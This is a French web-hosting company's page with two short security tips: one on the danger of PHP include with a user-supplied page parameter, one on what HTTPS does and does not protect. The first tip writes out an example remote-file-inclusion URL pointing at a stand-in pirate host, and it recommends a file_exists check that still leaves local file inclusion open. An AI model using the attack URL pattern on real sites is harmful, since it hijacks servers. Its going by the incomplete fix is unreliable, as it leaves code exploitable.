>> Nos services Internet
** Hébergements mutualisés de sites internet
** Hébergements Revendeurs
** Hébergements sur Serveur Privé Virtuel (VPS) et Dédié
** Vente et Gestion de Noms de domaine
>> Retrouvez-nous sur Facebook
>> Derniers sites créés:
** O2Permis - auto-école au Perréon (à base du moteur Wordpress)
** MydoggyDressing, Accessoires faschion pour chiens
(à base du moteur THELIA)
** Karine, votre esthéticienne à domicile (à base du moteur SPIP)
>> Derniers sites référencés:
** "avocat saint etienne":
katiaguillermet-avocat-saintetienne.fr
>> Alpes Hosting est Adhérant
>> Alpes Hosting est Revendeur
>> Alpes Hosting est Revendeur
|
 |
Attention aux INCLUDE dans les pages PHP
INCLUDE est une fonction sympathique en PHP qui permet d’intégrer un fichier dans un autre.
Je peux ainsi avoir une page index.php, qui contient le gabarit de mon site web, dans laquelle je fais un include d’une page passée en paramètre, ce qui donne comme lien:
index.php?page=accueil.html
et dans ma page index.php j’aurai ce morceau de script:
include (« $page »);
Ce type de code est très pratique, mais surtout plus que dangereux.
En effet on peut ainsi appeler une page externe avec un script permettant d’envoyer du Spam par exemple, cela en mettant dans la barre d’adresse du navigateur ce type de lien:
http://monsite.tld/index.php?page=http://sitedupirate.tld/monscriptdespam.php
Ainsi un pirate utilisera le serveur sur lequel vous êtes hébergé pour envoyer du Spam (ou faire d’autres choses encore plus dangereuses) à partir de ses propres scripts hébergés n’importe ou.
Voici le moyen d’éviter ce type de piratage:
Il suffit de remplacer le code ci-dessus: include (« $page »);
Par celui-ci:
if(file_exists($page))
{
require (« $page »);
}
else
{
include ‘mapageaccueil.html’;
}
Ce petit script qui fait aussi l’include de la page contenue dans la variable $page, teste avant l’include la présence locale du fichier que l’on demande d’afficher (if file_exists) et si le fichier n’existe pas comme dans l’exemple d’un pirate qui essayerait d’exécuter sa propre page, alors c’est une page d’accueil ou un page d’alerte qui est affichée.
Un moyen simple, mais efficace.
Site sécurisé https:// avec un certificat SSL.
On parle souvent de site sécurisé https:// avec un certificat SSL.
En fait, ce n’est pas le site qui est sécurisé, mais la connexion avec le site.
C’est à dire que si un visiteur se connecte sur la page https:// les données de la page sont cryptées depuis la sortie du serveur et ce jusqu’au navigateur du client qui va les décoder.
Si une personne intercepte les données entre deux, elle ne verra qu’un charabia impossible à exploiter. Donc, l’échange de données est sûr et protégé.
Mais,
Le https:// ne va pas sécuriser un site. Si le site a des faiblesses dans ses scripts php ou des CMS pas à jour, il peut être piraté tout aussi facilement qu’un site http:// De plus, les données stockées sur le serveur, sont en clair comme pour les sites http:// Seules les données qui transitent sur le réseau sont cryptées pendant la durée de leur transfert.
|
.: Mentions légales ::
C.G.V. ::
Tutoriels de Support :: Informations de maintenance :. |